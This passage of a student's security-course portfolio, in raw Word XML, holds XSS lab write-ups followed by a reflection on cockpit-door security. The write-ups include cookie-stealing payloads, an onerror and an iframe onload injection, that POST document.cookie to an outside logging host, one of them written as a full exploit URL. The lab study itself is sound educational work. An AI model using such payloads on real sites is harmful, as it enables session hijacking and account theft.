              <w:t xml:space="preserve"> previous attempts</w:t>
            </w:r>
            <w:r w:rsidR="00F36C04">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C63C3F4" w14:textId="61CA5559" w:rsidR="00F36C04" w:rsidRDefault="00F36C04" w:rsidP="00692191">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Then if we send the admin bot to our </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>blog</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> we can achieve similar aspect to retrieve the cookie of the bot. Hence the attack vector used in the blog input:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1466822F" w14:textId="77777777" w:rsidR="00C848C3" w:rsidRDefault="00C848C3" w:rsidP="00C848C3">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19DE9284" w14:textId="0E65DDA3" w:rsidR="00F36C04" w:rsidRDefault="00F36C04" w:rsidP="00F36C04">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <w:r w:rsidRPr="00F36C04">
              <w:t xml:space="preserve">" </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F36C04">
              <w:t>onerror</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F36C04">
              <w:t>="</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F36C04">
              <w:t>fetch('https://hkdk.events/6j8hbch8dxbs8m', {</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F36C04">
              <w:t xml:space="preserve">method: 'POST', body: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F36C04">
              <w:t>encodeURIComponent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F36C04">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F36C04">
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F36C04">
              <w:t>)})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6862415E" w14:textId="5F6D207B" w:rsidR="00F36C04" w:rsidRDefault="00F36C04" w:rsidP="6E9B7AC1">
            <w:r w:rsidRPr="00235E00">
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="722EBA7D" wp14:editId="6DF50CE2">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2445561</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>331836</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3159125" cy="2278380"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="55918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8330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59125" cy="2278380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7371E23E" w14:textId="779933C5" w:rsidR="00F36C04" w:rsidRDefault="00F36C04" w:rsidP="6E9B7AC1">
            <w:r w:rsidRPr="00F36C04">
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D787F69" wp14:editId="2A392960">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>140603</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>80914</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2108200" cy="2593743"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="199621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1972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108200" cy="2593743"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="245F1670" w14:textId="36F13AE4" w:rsidR="008B2D31" w:rsidRDefault="008B2D31" w:rsidP="6E9B7AC1"/>
          <w:p w14:paraId="06055629" w14:textId="3BF90798" w:rsidR="008B2D31" w:rsidRDefault="008B2D31" w:rsidP="008B2D31">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:r>
              <w:t>XSS 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37970617" w14:textId="342E1747" w:rsidR="6E9B7AC1" w:rsidRDefault="0005311F" w:rsidP="0005311F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Whilst </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and script tags aren’t searchable anything else is but the </w:t>
            </w:r>
            <w:r w:rsidR="00641016">
              <w:t xml:space="preserve">field </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onerror</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> tag would be a big stopping point</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F9CFEC0" w14:textId="304C1299" w:rsidR="0005311F" w:rsidRDefault="0005311F" w:rsidP="0005311F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>However</w:t>
            </w:r>
            <w:r w:rsidR="00641016">
              <w:t xml:space="preserve">, a way around this is to contradict the expected input and give </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00641016">
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00641016">
              <w:t xml:space="preserve"> guaranteed valid input and place an onload. For </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00641016">
              <w:t>example</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00641016">
              <w:t xml:space="preserve"> an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00641016">
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00986938">
              <w:t>f</w:t>
            </w:r>
            <w:r w:rsidR="00641016">
              <w:t>rame</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00641016">
              <w:t xml:space="preserve"> of the page itself</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="428994D0" w14:textId="64B31F7B" w:rsidR="00AA3DA4" w:rsidRDefault="00AA3DA4" w:rsidP="00AA3DA4">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00AA3DA4">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46CBAC31" wp14:editId="44F437DE">
                  <wp:extent cx="2451385" cy="2909454"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="5715"/>
                  <wp:docPr id="131052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23245" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2459596" cy="2919199"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="08342B6A" w14:textId="24C9EF71" w:rsidR="6E9B7AC1" w:rsidRDefault="6E9B7AC1" w:rsidP="6E9B7AC1"/>
          <w:p w14:paraId="3F890A36" w14:textId="650DBCAE" w:rsidR="6E9B7AC1" w:rsidRDefault="00641016" w:rsidP="6E9B7AC1">
            <w:hyperlink r:id="rId34" w:history="1">
              <w:r w:rsidRPr="00660C19">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://xss4.comp6841.xyz/search?q=%3Ciframe+src%3D%22%2F%22+onload%3D%22fetch%28%27https%3A%2F%2Fhkdk.events%2F6j8hbch8dxbs8m%27%2C+%7Bmethod%3A+%27POST%27%2C+body%3A+encodeURIComponent%28document.cookie%29%7D%29%22%3E%3C%2Fiframe%3E</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D7D581A" w14:textId="38FF0623" w:rsidR="6E9B7AC1" w:rsidRDefault="6E9B7AC1" w:rsidP="6E9B7AC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20118911" w14:textId="7BA2FE4D" w:rsidR="50317446" w:rsidRDefault="15D4996E" w:rsidP="53ACB0B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="53ACB0B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis and Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E11C2" w14:textId="33D104F7" w:rsidR="371C62D3" w:rsidRDefault="195DD59F" w:rsidP="0F3AFA8F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidRPr="0F3AFA8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Tutorial 2: Doors</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4B9D108C" w14:textId="6390B362" w:rsidR="00E56414" w:rsidRDefault="00F83B9E" w:rsidP="181B8E52">
            <w:r>
              <w:t xml:space="preserve">During the doors analysis the following key questions </w:t>
            </w:r>
            <w:r w:rsidR="00E56414">
              <w:t>were brought up for discussion:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66B3AE28" w14:textId="77E9D7B3" w:rsidR="00E56414" w:rsidRDefault="00E56414" w:rsidP="181B8E52"/>
          <w:p w14:paraId="12657F84" w14:textId="64CE066C" w:rsidR="00E56414" w:rsidRDefault="00E56414" w:rsidP="00E56414">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E56414">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">What are the assets being protected by the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>cockpit doors</w:t>
            </w:r>
            <w:r w:rsidRPr="00E56414">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D8A404" w14:textId="52812F13" w:rsidR="00E56414" w:rsidRDefault="00E56414" w:rsidP="00E56414">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Most assets were agreed on by people including the pilots, cockpit controls, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>passenger’s</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> safety, stewards, cargo and fuel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CFD704D" w14:textId="32F3A852" w:rsidR="003C7717" w:rsidRDefault="003C7717" w:rsidP="003C7717">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">One question was whether the protected assets should also include people or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>organisations</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> that are not directly connected to the plane, such as people on the ground or the reputation of aviation authorities. I think they should be included, because even if the airline does not own these assets, it still has a duty to protect them if harm could be caused by something under its control and hence could also been seen as negligence from a legal aspect i</w:t>
            </w:r>
            <w:r w:rsidR="009233F5">
              <w:t>f</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> these are not considered. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F0590E8" w14:textId="18340962" w:rsidR="003C7717" w:rsidRPr="00FF4B1F" w:rsidRDefault="003C7717" w:rsidP="003C7717">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF4B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">What </w:t>
            </w:r>
            <w:r w:rsidR="00AD0EB7" w:rsidRPr="00FF4B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>improvements</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF4B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> could be made to enhance the safety of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FF4B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>plane</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FF4B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41084301" w14:textId="26C1DE1D" w:rsidR="00C83C91" w:rsidRDefault="00C83C91" w:rsidP="00C83C91">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">The first suggestion was to add a third pilot, with only one pilot allowed to leave at a time. I </w:t>
            </w:r>
            <w:r w:rsidR="00AD0EB7">
              <w:t>disagree</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> because two malicious pilots are not necessarily less likely than one, especially if one can coerce the other or both planned the action together. This could create a larger vulnerability. I would only support it if the third pilot was randomly assigned or had no prior relationship or conflict of interest with the others.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56F083C3" w14:textId="65DE3EAC" w:rsidR="00157244" w:rsidRDefault="00157244" w:rsidP="00157244">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Another suggestion was to let remote systems take over from a malicious pilot, recover the plane’s position, and protect everyone on board. Most people argued that this would create a new vulnerability by giving external attackers another possible way to access the aircraft. My view was slightly different. Autopilot systems already rely heavily on external data from GPS, radar, and gyroscopes to control the plane. If an attacker can feed false information into these sensors, they may be able to mislead the autopilot and indirectly influence the aircraft without needing full </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authorised</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> access. This is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>similar to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> some CUAS attacks, where external signals are used to manipulate a system. In that sense, the current setup already has a type 1 weakness while trying to prevent a type 2 failure</w:t>
            </w:r>
            <w:r w:rsidR="00FF4B1F">
              <w:t>, hence should be rebalanced by providing remote access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78029EE7" w14:textId="3D4E5406" w:rsidR="008B185B" w:rsidRDefault="008B185B" w:rsidP="008B185B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Another proposal was to require two approvals before the cockpit door could be unlocked: one from a staff member and one from another person with a key. I mostly agreed with this because it adds a second judgement instead of relying on one person alone. To reduce the risk of coercion or pre-planning, I suggested that the second person should be randomly selected from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authorised</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> key holders on the plane. This would make it harder for attackers to predict or control who is involved. However, it could also increase the type 2 risk if a group of attackers stole keys and used them to force access to the cockpit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0C3A8B" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5824D917" w14:textId="78DB4C54" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5F92C56F" w14:textId="4E6701A4" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="6F72FB4A" w14:textId="3615F003" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="0F0DB0BA" w14:textId="46D8D1B1" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="659447F6" w14:textId="00749CEA" w:rsidR="50317446" w:rsidRDefault="31BE966E" w:rsidP="78017889">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="78017889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="5980147F" w:rsidRPr="78017889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wrap up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD548E" w14:textId="3B8DCC9B" w:rsidR="50317446" w:rsidRDefault="50317446" w:rsidP="181B8E52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Submission Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B53AEA" w14:textId="68559542" w:rsidR="13D4C4C5" w:rsidRDefault="13D4C4C5" w:rsidP="181B8E52">
      <w:r>
        <w:t>To submit a valid portfolio entry, complete the activities, save your work as a PDF, and upload it to the relevant week’s submission page on Moodle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683CCEB3" w14:textId="77777777" w:rsidR="001D26B6" w:rsidRDefault="001D26B6" w:rsidP="001D26B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Acknowledgement: Please note that artificial intelligence has been used for simple grammatical editing my written work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD7A62" w14:textId="77777777" w:rsidR="001D26B6" w:rsidRDefault="001D26B6" w:rsidP="181B8E52"/>
    <w:sectPr w:rsidR="001D26B6">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024FB" w14:textId="77777777" w:rsidR="00FF2020" w:rsidRDefault="00FF2020">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="33EEF275" w14:textId="77777777" w:rsidR="00FF2020" w:rsidRDefault="00FF20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ACB0B5" w14:paraId="1D9E3149" w14:textId="77777777" w:rsidTr="53ACB0B5">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="54993AE8" w14:textId="748C7294" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0B5">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="163D8527" w14:textId="0A636518" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0B5">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="54569A51" w14:textId="262609BE" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0B5">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText>PAGE</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="005741FF">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="40A54804" w14:textId="6F439D22" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0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4298C" w14:textId="77777777" w:rsidR="00FF2020" w:rsidRDefault="00FF2020">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="29E1390E" w14:textId="77777777" w:rsidR="00FF2020" w:rsidRDefault="00FF20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ACB0B5" w14:paraId="02764854" w14:textId="77777777" w:rsidTr="53ACB0B5">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="4DB87E93" w14:textId="4A2A68FD" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0B5">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="61D1D8C4" w14:textId="789423C1" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0B5">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="2B137313" w14:textId="469FC730" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0B5">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="5E8395CD" w14:textId="23BCF099" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0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4863"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73D6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77F69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65BE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76563"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE76637E"/>
    <w:lvl w:ilvl="0" w:tplc="1D5A5A68">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos" w:cstheme="minorBid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E8959D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC42D1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FE73F10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0256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12187E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EDC2CEC"/>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5132DEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E021DBA"/>
    <w:lvl w:ilvl="0" w:tplc="D4A6803E">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923DB14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AA69DEE"/>
    <w:lvl w:ilvl="0" w:tplc="482074C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3DD43CCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="94249E18">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A678CBB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A2B22DF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E0300F8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8178363E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4468C4E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="001C83E6">
      <w:start w:val="1"/>
